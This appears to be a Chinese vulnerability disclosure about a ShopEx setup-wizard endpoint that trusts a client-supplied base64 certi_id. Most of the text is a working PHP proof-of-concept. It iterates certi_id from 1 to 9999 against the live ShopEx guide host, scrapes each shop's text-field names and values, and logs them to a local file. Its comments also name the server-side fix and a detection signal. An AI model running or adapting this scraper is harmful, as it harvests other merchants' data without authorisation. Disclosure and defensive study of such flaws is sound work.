|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=

refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}

我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
<?php
// PoC driver for the report above: walks certi_id 1..9999 and fetches each
// wizard page. The id is the only thing that changes between requests, which
// is exactly the defect - nothing server-side ties the id to the requester.
$cid = 1;
while ($cid < 10000) {
    ShowshopExD($cid);
    $cid++;
}
/**
 * Fetches the ShopEx setup-wizard page for one certi_id and dumps every
 * text-input name/value pair it contains.
 *
 * This is the PoC for the reported flaw: the wizard takes its shop id from a
 * client-supplied, base64-encoded JSON "refer" parameter and renders that
 * shop's form data without checking that the caller owns the id, so any
 * caller can read every shop by iterating certi_id (broken object-level
 * authorization). The server-side fix is to derive the id from the
 * authenticated session and to sign and verify the refer blob instead of
 * trusting it; a run of sequential certi_id values from one client is the
 * detection signal.
 *
 * Side effects: prints each pair to stdout and appends it to c:/shopEx.txt.
 * The response body is transcoded UTF-8 -> GB2312 before matching, as in
 * the original.
 *
 * @param int|string $cid candidate certi_id; normalised with intval()
 * @return void
 */
function ShowshopExD($cid) {
    $endpoint = 'http://guide.ecos.shopex.cn/step2.php';
    // Same JSON shape as the refer observed in the browser; only the id varies.
    $referToken = base64_encode(
        '{"certi_id":' . intval($cid) . ',"callback_url":"http:\/\/www.a.com\/"}'
    );
    $handle = curl_init("{$endpoint}?refer={$referToken}");
    curl_setopt_array($handle, array(
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_BINARYTRANSFER => true,
    ));
    $body = mb_convert_encoding(curl_exec($handle), "gb2312", "UTF-8");

    // Truthiness check kept from the original: a refer echoed at offset 0
    // (or not echoed at all) counts as "no hit".
    if (strpos($body, $referToken)) {
        $log = fopen("c:/shopEx.txt", 'ab'); // append-only dump file
        preg_match_all('/<input\stype="text"(.*?)\/>/', $body, $inputs);
        foreach ($inputs[1] as $attrs) {
            preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/', trim($attrs), $parts);
            $line = $parts[1][0] . ':' . $parts[3][0] . "\r\n";
            echo $line;
            fwrite($log, $line, strlen($line));
        }
        echo '--------------------------------' . "\r\n";
        fclose($log);
    }
    flush();
    curl_close($handle);
}
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式
|
|